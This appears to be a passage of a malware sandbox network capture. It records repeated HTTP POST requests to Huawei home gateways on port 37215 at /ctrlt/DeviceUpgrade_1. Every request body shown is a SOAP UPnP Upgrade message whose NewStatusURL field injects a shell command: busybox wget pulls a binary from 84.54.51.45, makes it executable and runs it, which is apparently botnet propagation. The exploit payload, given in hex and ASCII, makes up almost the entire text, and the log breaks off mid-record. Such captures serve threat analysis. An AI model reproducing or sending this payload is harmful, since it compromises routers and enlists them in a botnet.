                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2423192.168.2.153917841.130.100.11437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.811599970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2424192.168.2.155032241.228.162.7637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.811631918 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2425192.168.2.153646041.26.172.237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.811655045 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2426192.168.2.154481241.185.98.24337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.811676979 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2427192.168.2.153649241.228.54.23137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.811723948 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2428192.168.2.153876041.169.242.6737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.811810970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2429192.168.2.155845441.206.169.19437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.811831951 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2430192.168.2.153788041.167.128.7737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.811857939 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2431192.168.2.154535041.47.255.23637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.812621117 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2432192.168.2.153945641.123.174.16037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.812621117 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 